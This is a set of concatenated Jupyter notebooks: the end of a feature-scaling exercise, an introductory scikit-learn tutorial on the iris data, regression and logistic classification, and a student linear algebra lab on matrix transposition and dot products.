# This cell should output: [(36572611.88531479, 18624475000000.0), (11097.0, 1378665000.0)]
gdp_normalizer.params
# This cell should output [0.7207969507229194, 0.9429407193285986]
gdp_normalizer.normalize_data([13424475000000.0, 1300000000])
# # Conclusion
#
# When normalizing or standardizing features for machine learning, you'll need to store the parameters you used to do the scaling. That way you can scale new data points when making predictions. In this exercise, you stored the minimum and maximum values of a feature. When standardizing data, you would need to store the mean and standard deviation. The standardization formula is:
#
# $x_{standardized} = \frac{x - \overline{x}}{S}$
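A hypothetical `Standardizer` class mirroring the `Normalizer` above might look like this (the class name is an assumption, and for simplicity this sketch takes a 2D `numpy` array with one row per observation rather than a dataframe):

```python
import numpy as np

class Standardizer():
    """Stores each column's mean and standard deviation so that new
    data points can be standardized later (hypothetical sketch)."""

    def __init__(self, data):
        # store (mean, standard deviation) for each column
        self.params = [(col.mean(), col.std()) for col in data.T]

    def standardize_data(self, x):
        # x is a single data point with columns in the same order as the data
        return [(value - mean) / std
                for value, (mean, std) in zip(x, self.params)]

standardizer = Standardizer(np.array([[1.0, 10.0], [2.0, 20.0], [3.0, 30.0]]))
print(standardizer.standardize_data([2.0, 20.0]))  # [0.0, 0.0]
```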
|
Pipelines/ETLPipelines/15_scaling_exercise/.ipynb_checkpoints/15_scaling_exercise-checkpoint.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# + slideshow={"slide_type": "skip"}
import numpy as np
import matplotlib.pyplot as plt
# %matplotlib notebook
# + [markdown] slideshow={"slide_type": "slide"}
# # Introduction to scikit-learn
#
# ##### Version 0.1
#
# ***
# By <NAME> (Northwestern/CIERA)
#
# 28 Feb 2022
# + [markdown] slideshow={"slide_type": "slide"}
# Broadly speaking, machine-learning methods constitute a diverse collection of data-driven algorithms designed to classify/characterize/analyze sources in multi-dimensional spaces. The set of topics and studies that fall under the umbrella of machine learning is growing, and there is no good catch-all definition. We cannot cover all possible algorithms.
# + [markdown] slideshow={"slide_type": "slide"}
# Today we will focus on the [`scikit-learn`](https://scikit-learn.org/stable/index.html) python library, which provides a nice interface to build a wide variety of machine learning models. As we will see, `scikit-learn` makes machine learning "easy."
# + [markdown] slideshow={"slide_type": "slide"}
# ## Problem 1) Data with `scikit-learn`
#
# In 4 lines we can build a complex classifier for the famous [iris data set](https://en.wikipedia.org/wiki/Iris_flower_data_set).
#
# from sklearn import datasets
# from sklearn.ensemble import RandomForestClassifier
# iris = datasets.load_iris()
# RFclf = RandomForestClassifier().fit(iris.data, iris.target)
# + [markdown] slideshow={"slide_type": "slide"}
# Those 4 lines of code have constructed a model that is superior to any system of hard cuts that we could have encoded while looking at the multidimensional space.
#
# It's also fast – execute the next cell.
# + slideshow={"slide_type": "slide"}
# execute example code here
from sklearn import datasets
from sklearn.ensemble import RandomForestClassifier
iris = datasets.load_iris()
RFclf = RandomForestClassifier().fit(iris.data, iris.target)
# + [markdown] slideshow={"slide_type": "slide"}
# Generally speaking, the procedure for `scikit-learn` is uniform across all machine-learning algorithms. Models are accessed via the various modules (`ensemble`, `SVM`, `neighbors`, etc), with user-defined tuning parameters. The features (or data) for the models are stored in a 2D array, `X`, with rows representing individual sources and columns representing the corresponding feature values.$^\dagger$ In cases where there is a known classification or scalar value (typically supervised methods), this information is stored in a 1D array `y`.
# + [markdown] slideshow={"slide_type": "subslide"}
# $^\dagger$In a minority of cases, `X` represents a similarity or distance matrix where each entry is the distance (or similarity) between a pair of sources in the data set.
# + [markdown] slideshow={"slide_type": "slide"}
# Unsupervised models are fit by calling `.fit(X)` and supervised models are fit by calling `.fit(X, y)`. In both cases, predictions for new observations, `Xnew`, can be obtained by calling `.predict(Xnew)`. Those are the basics and beyond that, the details are algorithm specific, so ...
#
# read the docs!
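A minimal sketch of this uniform interface on the iris data (the particular model choices here are illustrative, not prescribed by the notebook):

```python
from sklearn import datasets
from sklearn.cluster import KMeans
from sklearn.neighbors import KNeighborsClassifier

iris = datasets.load_iris()
X, y = iris.data, iris.target

# unsupervised: .fit(X) with no labels
kmeans = KMeans(n_clusters=3, n_init=10, random_state=0).fit(X)

# supervised: .fit(X, y), then .predict(Xnew) on new observations
knn = KNeighborsClassifier(n_neighbors=5).fit(X, y)
y_pred = knn.predict(X[:5])
print(y_pred)
```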
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 1a** What is the pythonic type of `iris`?
# + slideshow={"slide_type": "slide"}
# complete
# + [markdown] slideshow={"slide_type": "slide"}
# You likely haven't encountered a `scikit-learn Bunch` before. It's essentially the same as a dictionary.
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 1b** What are the keys of iris?
# + slideshow={"slide_type": "slide"}
# complete
# + [markdown] slideshow={"slide_type": "slide"}
# Most importantly, iris contains `data` and `target` values. These are all you need for `scikit-learn`, though the feature and target names and description are useful.
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 1c** What is the shape and content of the `iris` data?
# + slideshow={"slide_type": "slide"}
print(np.shape(# complete
print(# complete
# + [markdown] slideshow={"slide_type": "slide"}
# The data is a 2d array with shape 150 x 4.
#
# We said earlier that each row represents a source and each column a "feature."
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 1d**
#
# What is the first feature in the `iris` data set? What units is it measured in?
# + slideshow={"slide_type": "slide"}
print( # complete
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 1e**
#
# What is the shape and content of the `iris` target?
# + slideshow={"slide_type": "slide"}
print(np.shape( # complete
# complete
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 1f**
#
# What are the names of class 0, 1, and 2 in the `iris` target?
# + slideshow={"slide_type": "slide"}
# complete
# + [markdown] slideshow={"slide_type": "slide"}
# An important lesson from this week - worry about the data!
#
# If you are worried about the data, then you should look at the data. This is actually an important aspect of applying machine learning models.
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 1g**
#
# Make a scatter plot showing sepal length vs. sepal width for the iris data set. Color the points according to their respective classes.
# + slideshow={"slide_type": "slide"}
fig, ax = plt.subplots()
ax.scatter(# complete
# + [markdown] slideshow={"slide_type": "slide"}
# We will return to the `iris` data set later in this notebook.
# + [markdown] slideshow={"slide_type": "slide"}
# ## Problem 2) Linear Regression
# + [markdown] slideshow={"slide_type": "slide"}
# At its core, `scitkit-learn` is designed to help you, the user, easily fit models to data.
#
# To demonstrate this we will start with a familiar example - linear regression.
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 2a**
#
# Simulate data drawn from a linear relationship with Gaussian scatter.
# + slideshow={"slide_type": "slide"}
np.random.seed(2012)
n_obs = 25
x = np.random.uniform(0,100, n_obs)
y_true = 2.3*x + 14
y_obs = y_true + np.random.normal(0, 15, n_obs)
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 2b**
#
# Plot the simulated data. Overplot the true relation from which the data are drawn.
# + slideshow={"slide_type": "slide"}
fig, ax = plt.subplots()
ax.plot(# complete
# complete
# complete
# complete
# + [markdown] slideshow={"slide_type": "slide"}
# The [`sklearn.linear_model`](https://scikit-learn.org/stable/modules/classes.html#module-sklearn.linear_model) has a [`LinearRegression`](https://scikit-learn.org/stable/modules/generated/sklearn.linear_model.LinearRegression.html) class.
#
# The "standard" procedure in `scikit-learn` is to generate the model by creating an instance of the relevant class object (e.g., `reg_model = LinearRegression()`).
#
# The model is then trained using the aforementioned training and label arrays, `X` and `y`, with the `.fit()` method.
#
# Finally, predictions can be made using the `.predict()` method (note - the precise syntax for this can vary depending on the model being used).
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 2c**
#
# Generate an instance of the `LinearRegression` class. Call this instance `reg_model`.
# + slideshow={"slide_type": "slide"}
from sklearn.linear_model import LinearRegression
reg_model = # complete
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 2d**
#
# Fit the model to the training data `x` and `y_obs`.
#
# *Hint* - the standard feature array in `scikit-learn` is 2D, so you will need to convert `x` to a 2D array.
# + slideshow={"slide_type": "slide"}
X = # complete
reg_model.fit( # complete
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 2e**
#
# Output the best-fit parameters from the model (these are stored in the `.coef_` and `.intercept_` attributes).
#
# Overplot the best-fit line on top of the observations.
# + slideshow={"slide_type": "slide"}
print(f'The best fit is y = ' # complete
fig, ax = plt.subplots()
ax.plot( # complete
# complete
# complete
# complete
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 2f**
#
# Fit for the model parameters using some other method (e.g., `numpy`, `scipy`, linear algebra), and compare the model parameters to those found with `scikit-learn`.
# + slideshow={"slide_type": "slide"}
# complete
print('The best-fit model is: y = ' # complete
# + [markdown] slideshow={"slide_type": "slide"}
# The results are identical!
#
# Under the hood, linear regression (and polynomial regression more generally) is just linear algebra, so it doesn't matter which library you use to solve the problem. Both `numpy` and `scikit-learn` can handle multi-dimensional input and can even account for uncertainties on the observations via input weights.
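A hedged sketch of this equivalence on synthetic data (separate from the exercise's variables), comparing `scikit-learn` against `numpy.polyfit`:

```python
import numpy as np
from sklearn.linear_model import LinearRegression

rng = np.random.default_rng(2012)
x = rng.uniform(0, 100, 50)
y = 2.3 * x + 14 + rng.normal(0, 15, 50)

# scikit-learn fit
reg = LinearRegression().fit(x.reshape(-1, 1), y)

# numpy fit of the same least-squares problem
slope, intercept = np.polyfit(x, y, deg=1)

print(np.allclose([reg.coef_[0], reg.intercept_], [slope, intercept]))  # True
```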
# + [markdown] slideshow={"slide_type": "slide"}
# ## Problem 3) Linear Classification
# + [markdown] slideshow={"slide_type": "slide"}
# We will now examine why linear regression does not work for classification.
#
# Suppose we have a method to measure the mass of a galaxy (but this method has noise). We would like to separate the galaxies into two classes "normal" and "dwarf", where dwarf galaxies are those with a mass below 60. We could simulate such a dataset as follows.
# + [markdown] slideshow={"slide_type": "subslide"}
# *Note* - this is very much a "toy" data set to be used purely for illustration. While we use some familiar terms, nothing about this is truly physical, which is why we do not include units, etc.
# + slideshow={"slide_type": "slide"}
np.random.seed(1938)
n_obs = 200
mass = np.random.normal(65, 20, size=n_obs)
mass[mass > 70] *= (mass[mass > 70]-60)/60*5
y = (mass > 60).astype(bool)
obs_mass = mass + np.random.normal(0, 7, size=n_obs)
X = obs_mass.reshape(-1,1)
# + [markdown] slideshow={"slide_type": "slide"}
# In the previous cell we have simulated 200 galaxies, most of which are normal with masses > 60. We use this information to define our class vector `y`, such that all normal galaxies have a class of 1 and all dwarf galaxies have a class of 0. Finally, we simulate our observations `X`, which adds Gaussian noise to the true mass measurements.
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 3a**
#
# Build a classifier using `LinearRegression()`. Find the best fit line for the data. All sources with an extrapolated best-fit value > 0.5 are classified as normal, and everything else is considered a dwarf.
#
# From the training data, how accurate is this model?
# + slideshow={"slide_type": "slide"}
reg_model = # complete
reg_model.fit( # complete
y_pred = # complete
n_incorrect = np.sum((y_pred - y)**2)
accuracy = (n_obs - n_incorrect)/n_obs
print(f'This model has an accuracy of {accuracy:.3f}')
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 3b**
#
# To understand the short-comings of this model, plot the data. Overplot the best-fit linear regression model.
# + slideshow={"slide_type": "slide"}
fig, ax = plt.subplots()
ax.plot( # complete
# complete
# complete
# complete
# complete
# + [markdown] slideshow={"slide_type": "slide"}
# As we can see in the above plot, every galaxy with $\mathrm{mass} \gtrsim 78$ is classified as normal.
#
# It is also clear from the plot that linear regression is not a particularly good approach to this problem.
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 3c**
#
# Build a classifier via "hard cut" and assess its accuracy.
#
# Find the maximum mass for dwarf galaxies in the data set. Classify all sources with a mass less than this as dwarf galaxies.
# + slideshow={"slide_type": "slide"}
mass_cut = # complete
y_pred = # complete
# complete
# complete
# complete
# complete
# + [markdown] slideshow={"slide_type": "slide"}
# This represents a slight improvement over the linear regression model. (Note - if you did the reverse and used the normal galaxies to determine the mass cut, you would get similar results)
#
# At this point you must be thinking - "There has to be a better way!"
#
# Fortunately, there is.
# + [markdown] slideshow={"slide_type": "slide"}
# [Logistic Regression](https://en.wikipedia.org/wiki/Logistic_regression) - the "hello, world" of machine learning classification.
# + [markdown] slideshow={"slide_type": "slide"}
# (and also one of the absolutely worst named algorithms ever, as logistic regression is used for *classification* and not *regression*)
# + [markdown] slideshow={"slide_type": "slide"}
# Briefly, logistic regression is used to understand the relationship between a dependent variable (normal vs. dwarf) and one or more independent variables (mass, but could also be mass, star formation rate, metallicity, and so on) by estimating probabilities via the logistic function.
# + [markdown] slideshow={"slide_type": "slide"}
# The logistic function:
#
# $$ p(x) = \frac{1}{1 + e^{-(x - \mu)/s}}$$
#
# can be rewritten as:
#
# $$ p(x) = \frac{1}{1 + e^{-(B_0 + B_1 x)}}$$
#
# which recasts the problem as having a slope and intercept, similar to the linear regression problem that we worked on previously.
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 3d**
#
# Execute the cell below to see the logistic function.
#
# How might this be useful for our galaxy classification problem?
# + slideshow={"slide_type": "slide"}
x = np.linspace(-10,10,1000)
p_x = 1/(1 + np.exp(-x))
fig, ax = plt.subplots()
ax.plot(x, p_x)
ax.set_xlabel('x', fontsize=14)
ax.set_ylabel('p(x)', fontsize=14)
fig.tight_layout()
# + [markdown] slideshow={"slide_type": "slide"}
# *write your answer here*
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 3e**
#
# Create an instance of the [`LogisticRegression`](https://scikit-learn.org/stable/modules/generated/sklearn.linear_model.LogisticRegression.html) class from the `sklearn.linear_model` module.
#
# Fit the model to the simulated galaxy data.
# + slideshow={"slide_type": "slide"}
from sklearn.linear_model import LogisticRegression
logreg = # complete
logreg.fit( # complete
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 3f**
#
# Assess the accuracy of the Logistic Regression model.
# + slideshow={"slide_type": "slide"}
y_pred = # complete
# complete
# complete
# complete
# + [markdown] slideshow={"slide_type": "slide"}
# This model shows significant improvement over our alternative methods!
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 3g**
#
# Overplot the best fit logistic regression model on the data.
#
# *Hint* – the `.intercept_` and `.coef_` attributes can be used to determine the argument for the logistic function.
# + slideshow={"slide_type": "slide"}
fig, ax = plt.subplots()
ax.plot( # complete
# complete
# complete
# complete
# + [markdown] slideshow={"slide_type": "slide"}
# We can see that the logistic regression model is clearly superior to the linear regression model. The model is not perfect, but no model could be in the presence of noise.
#
# We also see that the probability cut ($p \approx 0.5 \;\mathrm{at\;mass} \approx 61.5$) is much closer to the true answer of 60.
# + [markdown] slideshow={"slide_type": "slide"}
# The previous example used a simple toy data set that was easy to visualize. But logistic regression can be extended to include multiple features, and more than two classes (in which case the problem is a multinomial one rather than a binomial one).
#
# This optimization happens entirely under the hood with `scikit-learn`.
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 3h**
#
# Fit a logistic regression model to the iris data set.
#
# Assess the accuracy of this model.
#
# *Hint* – [`accuracy_score`](https://scikit-learn.org/stable/modules/generated/sklearn.metrics.accuracy_score.html) from `sklearn.metrics` will simplify your calculations.
# + slideshow={"slide_type": "slide"}
from sklearn.metrics import accuracy_score
logreg = LogisticRegression( # complete
# complete
# complete
print('The accuracy of this model is {}' # complete
# + [markdown] slideshow={"slide_type": "slide"}
# In conclusion, today we have learned the basics of the `scikit-learn` library.
#
# We have also learned how the logistic regression algorithm can be very useful for classification problems. Logistic regression is often used as a starting point when building machine learning models: when faced with a new data set, logistic regression can be applied with minimal tuning to get a sense of whether machine learning could be helpful in classifying the data.
# + [markdown] slideshow={"slide_type": "slide"}
# I also want to end with two caveats:
#
# 1. Logistic regression is very powerful, but like all machine learning techniques, it also has limitations. For example, logistic regression can lead to "interpretable" results (such as the mean value where the curve transitions from 0 to 1), but these interpretations will not work if the features are correlated.
#
# 2. The error rates (1 - accuracy) measured throughout this notebook are the "training error." This is not a particularly good way to measure the efficacy of a model as we will discuss in further detail later today.
# + [markdown] slideshow={"slide_type": "slide"}
# ## Challenge Problem
#
# Pick any classification model from the `scikit-learn` library and measure its accuracy when applied to the iris data set.
# + slideshow={"slide_type": "slide"}
|
Sessions/Session14/Day1/IntroToScikitLearn.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/StephanyLera/Linear-Algebra_2nd-Sem/blob/main/Assignment_5.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + id="W1GUAueQJtEc"
#Linear Algebra for ChE
# + [markdown] id="J6Q6_FpmJ_X2"
# ## Laboratory 6 : Matrix Operations
# + [markdown] id="jj20lEyFKDIl"
# Now that you have a fundamental knowledge of representing and operating with vectors as well as the fundamentals of matrices, we'll try to do the same operations with matrices and even more.
# + [markdown] id="orDD9mjUKE5V"
# ### Objectives
# At the end of this activity you will be able to:
# 1. Be familiar with the fundamental matrix operations.
# 2. Apply the operations to solve intermediate equations.
# 3. Apply matrix algebra in engineering solutions.
# + [markdown] id="SIPEHXDFKIP-"
# ## Discussion
# + id="k2kWTHIQKJ9V"
import numpy as np
import matplotlib.pyplot as plt
# %matplotlib inline
# + [markdown] id="SoaSgVlQKNC9"
# ## Transposition
# + [markdown] id="twBoTcRdKQBe"
# One of the fundamental operations in matrix algebra is Transposition. The transpose of a matrix is done by flipping the values of its elements over its diagonals. With this, the rows and columns from the original matrix will be switched. So for a matrix $A$ its transpose is denoted as $A^T$. So for example:
# + [markdown] id="VgAzNLAtKQp1"
# $$A = \begin{bmatrix} 1 & 2 & 5\\5 & -1 &0 \\ 0 & -3 & 3\end{bmatrix} $$
# + [markdown] id="wdT0QbhqKS02"
# $$ A^T = \begin{bmatrix} 1 & 5 & 0\\2 & -1 &-3 \\ 5 & 0 & 3\end{bmatrix}$$
# + [markdown] id="npicfNOvKbjU"
# This can now be achieved programmatically by using `np.transpose()` or the `.T` attribute
# + colab={"base_uri": "https://localhost:8080/"} id="89-bFujoKcjs" outputId="eced97eb-1288-46ab-88eb-ce6a385e1ef3"
A = np.array([
[1,2,5],
[5,-1,0],
[0,-3,3]
])
A
# + colab={"base_uri": "https://localhost:8080/"} id="qg1HsuIeKeL9" outputId="bf716b49-213f-4eff-ae93-161949d73752"
AT1 = np.transpose(A)
AT1
# + colab={"base_uri": "https://localhost:8080/"} id="8M9q-_N5LQsl" outputId="b99ddf57-c784-46a1-a129-162cbb4148d4"
AT2 = A.T
AT2
# + colab={"base_uri": "https://localhost:8080/"} id="ijZeLNGwKx62" outputId="9889988e-8473-4439-8a46-03575eabf751"
np.array_equiv(AT1, AT2)
# + colab={"base_uri": "https://localhost:8080/"} id="Jiik6j1ZK9TF" outputId="dbf5a2c6-4522-4e1f-ef5f-357b833bd032"
B = np.array([
[2,4,6,8],
[1,2,3,4],
])
B.shape
# + colab={"base_uri": "https://localhost:8080/"} id="SiWIhKyCK93v" outputId="b88ed6cd-359c-4bb5-e733-8f9386809ea4"
np.transpose(B).shape
# + colab={"base_uri": "https://localhost:8080/"} id="ROEKG1TeK-9l" outputId="6c2c72a8-daa1-49b7-e9a9-a22707eaa8a3"
B.T.shape
# + [markdown] id="wenuFb_DLBCJ"
# #### Try to create your own matrix (you can try non-squares) to test transposition.
# + colab={"base_uri": "https://localhost:8080/"} id="jB7qnfZfLDf1" outputId="b89deb14-2251-4837-e9fe-f3b041504dcd"
D=np.array([
[2,4,6,8],
[1,2,3,4]
])
D.shape
# + colab={"base_uri": "https://localhost:8080/"} id="h-k41SIqLVBm" outputId="d24d9028-5aa0-4335-e78d-9b99a756d0c6"
np.transpose(D).shape
# + colab={"base_uri": "https://localhost:8080/"} id="C4V4a2TJLWA-" outputId="69d53d95-f44c-4b81-de3d-89beb4cd5c4c"
D.T.shape
# + colab={"base_uri": "https://localhost:8080/"} id="YEkyM5kVLad-" outputId="d403b274-1efc-4f07-c6ae-e81f486b825c"
DT = D.T
DT
# + [markdown] id="OzwjwrTJLdql"
# ## Dot Product / Inner Product
# + [markdown] id="EolF6mmPLea-"
# If you recall the dot product from laboratory activity before, we will try to implement the same operation with matrices. In matrix dot product we are going to get the sum of products of the vectors by row-column pairs. So if we have two matrices $X$ and $Y$:
#
# $$X = \begin{bmatrix}x_{(0,0)}&x_{(0,1)}\\ x_{(1,0)}&x_{(1,1)}\end{bmatrix}, Y = \begin{bmatrix}y_{(0,0)}&y_{(0,1)}\\ y_{(1,0)}&y_{(1,1)}\end{bmatrix}$$
#
# The dot product will then be computed as:
# $$X \cdot Y= \begin{bmatrix} x_{(0,0)}*y_{(0,0)} + x_{(0,1)}*y_{(1,0)} & x_{(0,0)}*y_{(0,1)} + x_{(0,1)}*y_{(1,1)} \\ x_{(1,0)}*y_{(0,0)} + x_{(1,1)}*y_{(1,0)} & x_{(1,0)}*y_{(0,1)} + x_{(1,1)}*y_{(1,1)}
# \end{bmatrix}$$
#
# So if we assign values to $X$ and $Y$:
# $$X = \begin{bmatrix}1&2\\ 0&1\end{bmatrix}, Y = \begin{bmatrix}-1&0\\ 2&2\end{bmatrix}$$
# + [markdown] id="TJp2f8WnLjaG"
# $$X \cdot Y= \begin{bmatrix} 1*-1 + 2*2 & 1*0 + 2*2 \\ 0*-1 + 1*2 & 0*0 + 1*2 \end{bmatrix} = \begin{bmatrix} 3 & 4 \\2 & 2 \end{bmatrix}$$
# This could be achieved programmatically using `np.dot()`, `np.matmul()` or the `@` operator.
# + id="6-FKUk4kLmBe"
X = np.array([
[5,8],
[1,2]
])
Y = np.array([
[-1,6],
[5,9]
])
# + colab={"base_uri": "https://localhost:8080/"} id="0P1N3akjLn5g" outputId="5aac8044-b5cd-4d93-c59e-8004598f770a"
np.array_equiv(X, Y)
# + colab={"base_uri": "https://localhost:8080/"} id="1RNw6l6kLrqu" outputId="28df0ec9-b8a7-4cef-91aa-23ae9c2b8cd4"
np.dot(X,Y)
# + colab={"base_uri": "https://localhost:8080/"} id="rOiXFO-WLr3q" outputId="e5709fd1-fa9e-4acd-d4c2-1fec58b73c0b"
X.dot(Y)
# + colab={"base_uri": "https://localhost:8080/"} id="6AYUS-s6LpDH" outputId="6d8958ae-f316-4e73-fcf5-a9f57b6624f8"
X @ Y
# + colab={"base_uri": "https://localhost:8080/"} id="Rvbz4ab1Lvt-" outputId="713c6025-b4fd-4af3-fbfc-53f411d2ec5a"
np.matmul(X,Y)
# + id="FmJcTuYqMBDJ"
K = np.array([
[5,7,9],
[1,2,3],
[4,8,12]
])
J = np.array([
[-2,0,5],
[2,-4,6],
[7,4,-3]
])
# + colab={"base_uri": "https://localhost:8080/"} id="jYz51NMkMCt2" outputId="153b0fbf-6112-45f1-dc79-ead65c8131b2"
np.array_equiv(K, J)
# + colab={"base_uri": "https://localhost:8080/"} id="EI5oHO9IMFI5" outputId="46ab5b4e-57d3-4c21-a8d0-0ec28ff7d1c8"
K @ J
# + colab={"base_uri": "https://localhost:8080/"} id="yPddExi9MHZh" outputId="cdff4255-1cc3-4283-dc34-bf4c569a4512"
K.dot(J)
# + colab={"base_uri": "https://localhost:8080/"} id="PEhPPyxRMFOH" outputId="4a57654c-4b96-4a99-e4ef-6f4201c65060"
np.matmul(K, J)
# + colab={"base_uri": "https://localhost:8080/"} id="XrXnwwX7MKP4" outputId="41ba8e30-78ef-44ac-b66a-af2ac10334a0"
np.dot(K, J)
# + [markdown] id="E8_hbXCdMMV-"
# Matrix dot products carry additional rules compared with vector dot products. Vector dot products operate in a single dimension, so there are fewer restrictions. Now that we are dealing with rank-2 arrays, we need to consider some rules:
#
# ### Rule 1: The inner dimensions of the two matrices in question must be the same.
#
# Given a matrix $A$ with a shape of $(a,b)$, where $a$ and $b$ are any integers, if we want to take the dot product of $A$ with another matrix $B$, then $B$ must have a shape of $(b,c)$ for some integer $c$. So, given the following matrices:
#
# $$Z = \begin{bmatrix}2&4&5\\5&-2&6\\0&1&2\end{bmatrix}, O = \begin{bmatrix}1&1\\3&3\\-1&4\end{bmatrix}, E = \begin{bmatrix}0&1&1&3\\1&1&2&5\end{bmatrix}$$
#
# In this case $Z$ has a shape of $(3,3)$, $O$ has a shape of $(3,2)$, and $E$ has a shape of $(2,4)$. Among these, the pairs eligible for a dot product include $Z \cdot O$ and $O \cdot E$, since their inner dimensions match.
# + colab={"base_uri": "https://localhost:8080/"} id="lEW30ae0MRqn" outputId="1696995a-7e29-4193-be80-5fb3e0c77e21"
Z = np.array([
[2, 4, 5],
[5, -2, 6],
[0, 1, 2]
])
O = np.array([
[1,1],
[3,3],
[-1,4]
])
E = np.array([
[0,1,1,3],
[1,1,2,5]
])
print(Z.shape)
print(O.shape)
print(E.shape)
# + colab={"base_uri": "https://localhost:8080/"} id="2Qr9SmidMTp5" outputId="9bfbb17a-9837-467d-c20c-6e126abee94b"
O @ E
# + [markdown] id="td8R-fyJMWbI"
# Notice that the shape of the dot product is not the same as the shape of either matrix we used. The shape of a dot product is derived from the shapes of the matrices involved: recall matrix $A$ with a shape of $(a,b)$ and matrix $B$ with a shape of $(b,c)$; then $A \cdot B$ will have a shape of $(a,c)$.
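# A one-line sketch of this shape bookkeeping, using placeholder matrices of ones:

```python
import numpy as np

# A (3,2) matrix times a (2,4) matrix yields a (3,4) result
A = np.ones((3, 2))
B = np.ones((2, 4))
print((A @ B).shape)  # (3, 4)
```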
# + colab={"base_uri": "https://localhost:8080/"} id="6y_4RqTfMVXP" outputId="be656b87-d8d9-4438-d189-4b8ed352d16f"
X = np.array([
[1,2,3,0]
])
Y = np.array([
[1,0,4,-1]
])
print(X.shape)
print(Y.shape)
# + colab={"base_uri": "https://localhost:8080/"} id="iqVmwLAHMbMC" outputId="169a1845-6135-4d81-8a6b-a8835e8f0ae4"
Y.T @ X
# + colab={"base_uri": "https://localhost:8080/"} id="87P6HLqwMciX" outputId="c9421248-305b-46d7-868f-429bb4f84f24"
X @ Y.T
# + [markdown] id="TW-I0rITMQC4"
# And you can see that when you try to multiply $X$ and $Y$ directly (e.g. `X @ Y`), NumPy raises a `ValueError` because of the matrix shape mismatch.
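# A minimal sketch of that failure mode, using the same row vectors as above and catching the error so the cell still runs:

```python
import numpy as np

# The (1,4) row vectors above cannot be multiplied directly:
# the inner dimensions (4 and 1) do not match
X = np.array([[1, 2, 3, 0]])
Y = np.array([[1, 0, 4, -1]])
try:
    X @ Y
except ValueError as e:
    print("Cannot multiply", X.shape, "by", Y.shape, "->", e)
```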
# + [markdown] id="Cn16PQO8MgpP"
# ### Rule 2: Dot Product has special properties
#
# Dot products are prevalent in matrix algebra, which implies several unique properties that should be considered when formulating solutions:
# 1. $A \cdot B \neq B \cdot A$
# 2. $A \cdot (B \cdot C) = (A \cdot B) \cdot C$
# 3. $A\cdot(B+C) = A\cdot B + A\cdot C$
# 4. $(B+C)\cdot A = B\cdot A + C\cdot A$
# 5. $A\cdot I = A$
# 6. $A\cdot \emptyset = \emptyset$
# + [markdown] id="I_8QlwLQMkC_"
# I'll be doing just one of the properties and I'll leave the rest to test your skills!
# + id="LvwY_4pgMmZ3"
A = np.array([
[3,2,1],
[4,5,1],
[1,1,1]
])
B = np.array([
[4,1,6],
[4,1,9],
[1,4,8]
])
C = np.array([
[1,1,0],
[0,1,1],
[1,0,1]
])
# + colab={"base_uri": "https://localhost:8080/"} id="DJ-Y6_ouMocn" outputId="ea20b2c5-b15a-4cad-b03c-56b8a043ebfc"
np.eye(4)
# + colab={"base_uri": "https://localhost:8080/"} id="b-xheKA1Mp1e" outputId="30c42559-8d24-4867-d5c6-963db49c9cac"
np.eye(3)
# + colab={"base_uri": "https://localhost:8080/"} id="gsg-gV8LMtr3" outputId="7581d0ac-5e67-4e99-e1ee-0a90f8fd39f5"
A.dot(np.eye(3))
# + colab={"base_uri": "https://localhost:8080/"} id="ZtO7FhxOMvbA" outputId="6963e618-4dce-4124-d976-3a45a95c2207"
np.array_equal(A@B, B@A)
# + colab={"base_uri": "https://localhost:8080/"} id="TYrCX3sBMxNo" outputId="e24e9d61-7898-4b90-9025-67d8b1d5bc8d"
E = A + (B + C)
E
# + colab={"base_uri": "https://localhost:8080/"} id="ue6I79rcMyow" outputId="ecd232b4-9bcb-4d12-ae05-138aa4a89696"
E = A @ (B @ C)
E
# + colab={"base_uri": "https://localhost:8080/"} id="AdtL_A5vM0Zx" outputId="5982a426-531c-40d6-cb77-9a2fd90e014a"
E = (B + C) @ A
E
# + colab={"base_uri": "https://localhost:8080/"} id="KqBY81VXM2qr" outputId="dd19da03-d7ce-4fa1-c12e-b0d55909ea1e"
F = (A @ B) @ C
F
# + colab={"base_uri": "https://localhost:8080/"} id="ssCwowUDM5xv" outputId="70eccee8-b2d3-46e6-a817-81f5008b4f8f"
np.array_equal(E, X)
# + colab={"base_uri": "https://localhost:8080/"} id="l_HHOookM53-" outputId="094c6334-6eb0-4c2c-bbee-f46d5c3654f8"
np.array_equal(E, F)
# + colab={"base_uri": "https://localhost:8080/"} id="D26GpRPNM_Of" outputId="ee59f2f1-6d3a-49f8-9151-cefaac097e3e"
A @ E
# + colab={"base_uri": "https://localhost:8080/"} id="5CaQzEqPNAc_" outputId="875374f0-16b5-4ff6-ab28-b6d6a53ebe50"
z_mat = np.zeros(A.shape)
z_mat
# + colab={"base_uri": "https://localhost:8080/"} id="Eek8tzoiNChH" outputId="eb1635ed-4242-4948-9c15-7b7845252203"
a_dot_z = A.dot(np.zeros(A.shape))
a_dot_z
# + colab={"base_uri": "https://localhost:8080/"} id="Kxu-jL5QNDzn" outputId="50ca483f-1690-46f4-a3d2-7a03875e4dd1"
